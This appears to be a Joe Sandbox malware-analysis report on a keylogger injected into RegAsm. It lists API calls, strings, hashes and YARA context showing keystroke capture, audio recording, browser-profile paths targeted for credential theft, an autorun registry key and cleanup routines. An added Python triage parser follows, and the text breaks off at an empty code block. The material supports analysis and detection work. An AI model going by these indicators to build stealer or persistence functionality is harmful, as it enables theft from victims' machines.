                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                  • String ID: Online Keylogger Stopped
                                                                                                                                                                                                  • API String ID: 1623830855-1496645233
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
Strings
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DateFormat
• String ID: GetDateFormatEx$t'`/
• API String ID: 2793631785-3410012695
APIs
• waveInPrepareHeader.WINMM(00839000,00000020,?), ref: 00401849
• waveInAddBuffer.WINMM(00839000,00000020), ref: 0040185F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: XMG
• API String ID: 2315374483-813777761
APIs
• CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004540DC,?,00000000,?,?,0045407B,?,?,?,004540DC), ref: 0044870C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CompareString
• String ID: {@E$t'`/
• API String ID: 1825529933-542622644
APIs
• GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 00448A86
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FormatTime
• String ID: GetTimeFormatEx$t'`/
• API String ID: 3606616251-4102510658
APIs
• GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00451688,?,00000055,00000050), ref: 00448AE7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DefaultUser
• String ID: GetUserDefaultLocaleName$t'`/
• API String ID: 3358694519-1583144982
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                  • API String ID: 1174141254-2800177040
                                                                                                                                                                                                  • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                                                                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                                                  • API String ID: 1174141254-1629609700
                                                                                                                                                                                                  • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                                                                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                                  • String ID: [AltL]$[AltR]
                                                                                                                                                                                                  • API String ID: 2738857842-2658077756
                                                                                                                                                                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Free
                                                                                                                                                                                                  • String ID: FlsFree$t'`/
                                                                                                                                                                                                  • API String ID: 3978063606-1518515932
                                                                                                                                                                                                  • Opcode ID: f639ac55640d1e466334e240508b6cf44afd65e2d168f9cdd456b26f93361ae4
                                                                                                                                                                                                  • Instruction ID: c2240784685aecd6f47a0bca57caed754204828342c7a30858990c1a98a2f1dd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f639ac55640d1e466334e240508b6cf44afd65e2d168f9cdd456b26f93361ae4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E0E531B41618FBD3017F25AC02A6FBB60DB44B12B5001AEFC0597241DE795D14D6DE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                                  • String ID: !D@$open
                                                                                                                                                                                                  • API String ID: 587946157-1586967515
                                                                                                                                                                                                  • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: State
                                                                                                                                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                  • API String ID: 1649606143-2446555240
                                                                                                                                                                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: ,kG$0kG
• API String ID: 1881088180-2015055088
• Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
• Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
• Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
• Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
APIs
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
• Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
• Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
• Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
• Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
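The function blocks on this page all follow one fixed layout (the labels APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Yara matches and Similarity, each followed by bulleted "key: value" lines), which makes them easy to turn into structured records for bulk triage, for example to find every function that touches the Policies\Explorer\Run autorun path seen in the block above. The Python below is an added example, not code from Joe Sandbox or from the analysed sample: it parses blocks in that layout and runs a few triage rules over them. The rules, the tag names and the SAMPLE excerpt (a constructed string assembled from blocks on this page) are this example's own choices.

```python
"""Parse Joe Sandbox 'IDA Plugin' function blocks into records and apply simple triage rules.

Added example, not code from Joe Sandbox or from the analysed sample. The block
layout is taken from the report text on this page; SAMPLE is a constructed
excerpt assembled from those blocks. The triage rules are assumptions about what
an analyst would want flagged, not something the report states.
"""
import re
from dataclasses import dataclass, field

SECTION_LABELS = {"APIs", "Strings", "Memory Dump Source",
                  "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
BULLET = "\u2022"  # the report puts '•' in front of every data line

# "DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1"  or  "GetLastError.KERNEL32 ref: 00440D85"
API_RE = re.compile(r"^(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "Software\Microsoft\...\Run\, xrefs: 00413A6A"
STR_RE = re.compile(r"^(?P<s>.*), xrefs:\s*(?P<x>[0-9A-Fa-f, ]+)$")


@dataclass
class ApiCall:
    func: str
    module: str
    args: list[str]
    ref: int  # address of the call site


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, list[int]]] = field(default_factory=list)  # (string, xref addresses)
    meta: dict[str, list[str]] = field(default_factory=dict)  # repeated keys such as Associated keep every value


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Start a new block at every 'APIs' label and collect that block's fields by section."""
    blocks: list[FunctionBlock] = []
    current = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_LABELS:
            if line == "APIs":  # every function block begins with its APIs label
                current = FunctionBlock()
                blocks.append(current)
            section = line
            continue
        if current is None or not line.startswith(BULLET):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                current.apis.append(ApiCall(m["func"], m["module"], args, int(m["ref"], 16)))
        elif section == "Strings":
            m = STR_RE.match(body)
            if m:
                xrefs = [int(x, 16) for x in m["x"].replace(" ", "").split(",") if x]
                current.strings.append((m["s"], xrefs))
        else:  # Memory Dump Source / IDA Plugin / Similarity lines are plain key: value
            key, _, value = body.partition(":")
            current.meta.setdefault(key.strip(), []).append(value.strip())
    return blocks


AUTORUN_PATHS = (r"\currentversion\run", r"\currentversion\policies\explorer\run")
LOADER_ERRORS = {"0000007E", "0000007F"}  # ERROR_MOD_NOT_FOUND, ERROR_PROC_NOT_FOUND


def triage(block: FunctionBlock) -> list[str]:
    """Tags for patterns worth a closer look (the rules are this example's assumptions)."""
    tags = []
    names = {a.func for a in block.apis}
    texts = [s for s, _ in block.strings] + block.meta.get("String ID", [])
    if any(p in t.lower() for t in texts for p in AUTORUN_PATHS):
        tags.append("autorun_key")
    if "TerminateProcess" in names:
        tags.append("process_kill")
    if {"DeleteFileW", "RemoveDirectoryW"} <= names:
        tags.append("file_cleanup")
    if "IsBadReadPtr" in names and any(
            a.func == "SetLastError" and a.args and a.args[0] in LOADER_ERRORS for a in block.apis):
        tags.append("import_resolution_candidate")
    return tags


def summarize(blocks: list[FunctionBlock]) -> dict[int, list[str]]:
    """Block index -> tags, for blocks that produced at least one tag."""
    return {i: t for i, b in enumerate(blocks) if (t := triage(b))}


# Constructed excerpt in the report's layout (lines copied from blocks on this page).
SAMPLE = r"""
APIs
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
Strings
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
• SetLastError.KERNEL32(0000007F,?,?), ref: 00411CB5
• SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
• GetLastError.KERNEL32 ref: 00440D85
Similarity
• API ID: ErrorLastRead
"""

if __name__ == "__main__":
    for idx, tags in summarize(parse_blocks(SAMPLE)).items():
        print(idx, tags)
```

To use it on a whole report, feed the saved page text to `parse_blocks` instead of SAMPLE; the "Source File" value identifies which memory dump (here process 0xD at 0x400000, the code injected into RegAsm) each flagged function came from, so hits can be grouped per dump before pivoting into the disassembly at the recorded `ref` addresses.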
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
• API String ID: 3325800564-4028850238
• Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
• Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
• Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
• Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
• WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
• API String ID: 1872346434-4028850238
• Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
• Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
• Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
• Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
• GetLastError.KERNEL32 ref: 00440D85
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
• Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
• Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
• Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
• SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLastRead
• String ID:
• API String ID: 4100373531-0
• Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
• Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
• Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
• Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99
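The block immediately above is worth a second look: it probes memory with IsBadReadPtr(ptr, 0x14) and then sets the last error to 0x7F or 0x7E. 0x14 is sizeof(IMAGE_IMPORT_DESCRIPTOR), and 0x7E and 0x7F are ERROR_MOD_NOT_FOUND and ERROR_PROC_NOT_FOUND, the two codes a loader reports when a DLL or an imported function cannot be resolved. That combination is the signature of code that walks a PE's import table and fixes up the IAT itself instead of letting the Windows loader do it, which fits a payload that is mapped into RegAsm rather than loaded from disk. Whether the sample's routine does exactly this is an inference from those four calls, not something the report states. The Python below is an added example of the generic technique (not code recovered from the sample): it walks a constructed 32-bit import directory in an already-mapped image, resolves names and ordinals against a dict of fake module exports that stands in for LoadLibrary/GetProcAddress, patches the IAT slots, and leaves the same error codes a real loader would.

```python
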